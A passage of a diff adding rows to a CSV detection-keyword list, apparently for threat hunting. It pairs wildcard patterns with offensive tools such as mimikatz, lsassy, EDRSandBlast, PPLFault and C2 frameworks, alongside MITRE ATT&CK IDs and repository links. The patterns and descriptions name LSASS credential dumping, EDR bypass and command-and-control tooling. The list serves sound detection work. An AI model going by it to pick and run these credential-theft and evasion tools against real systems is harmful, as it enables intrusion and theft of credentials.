+"*lsadump::setntlm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*lsadump::trust*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*lsadump::zerologon*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*lsarpc_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*LSASecretDefaultPassword*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
+"*lsasecrets.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
+"*lsass comsvcs*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*lsass direct*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*Lsass Dump File Created*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z"
+"*lsass dump from agent*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*LSASS dump might fail if RunAsPPL is enabled*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
+"*lsass.dmp*","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*lsass.dmp*","offensive_tool_keyword","lsass","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","N/A","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*lsass.dmp*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
+"*lsass.exe*.dmp*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","0","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z"
+"*lsass.exe*C:\temp\tmp.tmp*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z"
+"*lsass_*.dmp*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*lsass_dump_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*lsass_dump_lsassy_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*lsassdump.dmp*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
+"*LsassDump_20*.ps1*","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","984","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z"
+"*lsassdumps*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Lsass-Mdump*","signature_keyword","Antivirus Signature","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","TA0006","N/A","N/A","Credential Access","lsass dump malware signature","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*LSASSProtectionBypass*/","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z"
+"*LsassSilentProcessExit.cpp*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z"
+"*LsassSilentProcessExit.exe*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z"
+"*LsassSilentProcessExit.vcxproj*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z"
+"*LsassSilentProcessExit-master*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z"
+"*lsassy *","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*lsassy -*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z"
+"*lsassy -v -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*lsassy.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*lsassy/dumpmethod*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*lsassy_dump*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*lsassy_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*lsassy_dump.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*lsassy-linux-x64-*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*lsassy-MacOS-x64-*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*lsassy-windows-x64-*.exe","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*lse.sh -l*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z"
+"*luckystrike.ps1*","offensive_tool_keyword","luckystrike","A PowerShell based utility for the creation of malicious Office macro documents.","T1566 - T1059 - T1027","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/curi0usJack/luckystrike","1","1","N/A","N/A","10","1084","250","2017-11-03T17:52:13Z","2016-09-22T18:57:50Z"
+"*LUgsLS1IT1NU*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z"
+"*luijait/PwnKit*","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","79","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z"
+"*luks2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*lures create *","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z"
+"*LVAsLS1QT1JU*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z"
+"*LW8sLS1vcHRpb25z*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z"
+"*LWIsLS1idWNrZXQ=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z"
+"*LWYsLS1maWxl*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*LXAsLS1waWQ=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*LXAsLS1wYXlsb2Fk*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*LXUsLS11cmk=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*ly4k/Certipy*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. 
